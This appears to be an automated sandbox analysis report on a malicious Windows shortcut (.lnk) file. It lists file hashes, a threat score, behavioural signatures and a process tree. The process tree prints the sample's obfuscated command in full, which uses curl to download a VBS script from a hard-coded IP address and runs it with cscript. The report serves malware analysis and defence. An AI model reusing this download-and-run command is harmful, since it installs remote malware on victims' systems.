Overview

overview

8

Static

static

1

2b31d24b40...df.lnk

windows7-x64

3

2b31d24b40...df.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 00:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk

  • Size

    2KB

  • MD5

    1f5ddc00ded03b107ed1306f49592188

  • SHA1

    a44896e8ad949c6c83f3d8cb1caccf6056e8ed22

  • SHA256

    2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df

  • SHA512

    85131d8da35735a31b0cb0570e89bb18cefee09a237bb8c6a9f860b5bc19c2a73146f98c9603f28950f3d32b7dfb1ed8b67c7196dbc6de4f119c56ee5bf53668

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\2b31d24b4040c4e57b0763eb38c387f3d98411780e9e3580a6f1933e1bcfa2df.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2176
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c GD || echO GD & PI"n"G GD || CU"R"l http://185.39.18.170/ER/rbo -o C:\Users\Admin\AppData\Local\Temp\GD.vbs & PI"n"G -n 2 GD || cS"CR"I"pt" C:\Users\Admin\AppData\Local\Temp\GD.vbs & ExIT
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4680
      • C:\Windows\system32\PING.EXE
        PI"n"G GD
        3⤵
        • Runs ping.exe
        PID:3520
      • C:\Windows\system32\curl.exe
        CU"R"l http://185.39.18.170/ER/rbo -o C:\Users\Admin\AppData\Local\Temp\GD.vbs
        3⤵
          PID:4152
        • C:\Windows\system32\PING.EXE
          PI"n"G -n 2 GD
          3⤵
          • Runs ping.exe
          PID:2928
        • C:\Windows\system32\cscript.exe
          cS"CR"I"pt" C:\Users\Admin\AppData\Local\Temp\GD.vbs
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1892
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe"
            4⤵
              PID:4552

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\GD.vbs
        Filesize

        1KB

        MD5

        aaf0775875ed139ac0e027ef0a74fe4e

        SHA1

        1fed106b3245bd2def846fcf26da2262f2ee1090

        SHA256

        c77765e4b787bbf1c807035b526b86878a57a7e8e4809f92e19d8002ba3b1b9f

        SHA512

        307964303d3e9b98dd7cc9ad560e8a90ca1e2a4dad39a9de99c5f789793e760c29a17b7458ad5fc115a4b4e1175f31a0da2793f8eaaaa722ae06f50d6afab2da

        Download Submit